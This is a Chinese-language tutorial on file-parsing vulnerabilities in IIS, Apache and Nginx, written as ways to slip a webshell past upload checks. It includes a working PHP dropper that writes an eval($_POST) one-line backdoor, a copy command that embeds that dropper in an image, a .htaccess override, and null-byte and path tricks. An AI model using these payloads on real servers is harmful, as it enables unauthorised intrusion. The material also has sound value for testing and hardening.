0x00 IIS 6.0解析漏洞
目录解析漏洞
Eg:
/xx.asp/webshell.jpg
/xx.asa/webshell.jpg
上面两个例子演示了目录解析漏洞,以.asp或.asa结尾的目录下的任何文件都被当做asp文件来解析并执行。
这如果网站本身存在这类目录,或者可以自己创建一个,而且存在跨目录上传漏洞的话,那不需要绕过文件类型检测都可以拿到网站的shell了
文件解析漏洞
Eg:
webshell.asp;jpg --> webshell.asp
上例就是IIS6.0的文件解析漏洞,很直观,意思就是分号后面的不被解析,即解析得webshell.asp,是可执行文件。
IIS6.0除了asp为可执行文件,还有asa、cer、cdx等都是可执行文件。
0x01 Apache解析漏洞
Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。
比如 test.php.qwe.asd,“.qwe”和”.asd” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.qwe.asd解析成php。
其余配置问题导致漏洞
(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。
(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。
(3).htaccess文件如果可以上传且能覆盖原有配置,
文件写入配置<FilesMatch "hello"> SetHandler application/x-httpd-php </FilesMatch>
上面配置意思是:无论文件后缀是什么,主要包含hellp就会php解析器解析此文件
0x02 IIS 7.0/IIS 7.5/ Nginx版本小于8.03的畸形解析漏洞
Fast-CGI开启
这种漏洞的利用方式是在默认Fast-CGI开启状况下,攻击者上传一个名字为sp.jpg,内容为
<?PHP fputs(fopen('payload.php','w'),' <?php eval($_POST[hehe])?>');?>
的文件,然后当访问sp.jpg/.php这个页面,在这个目录下就会生成一句话木马 payload.php。
常见利用方式:将一张图片和一个写入后门代码的文本合并,将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾
eg:copy xx.jpg /b + yy.txt /a xy.jpg
/b 即二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件
yy.txt内容为<?PHP fputs(fopen('payload.php','w'),' <?php eval($_POST[hehe])?>');?>,意思是将<?php eval($_POST[hehe])?>写入到payload.php的文件中,这样就注入了一个webshell
Fast-CGI关闭(Nginx <8.03 空字节代码执行漏洞)
在Fast-CGI关闭的情况下,Nginx <=0.8.37 依然存在解析漏洞
在一个文件路径(/xx.jpg)后面加上%00.php会将 /xx.jpg%00.php 解析为 php 文件。
利用方式:
在图片中嵌入php代码,嵌入的方法可以使用上面提到的copy命令
访问xxx.jpg%00.php,这样就会执行图片中的php代码
0x03 其他
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,这也是可以被利用的!
eg:
xx.jpg%00
xx.jpg.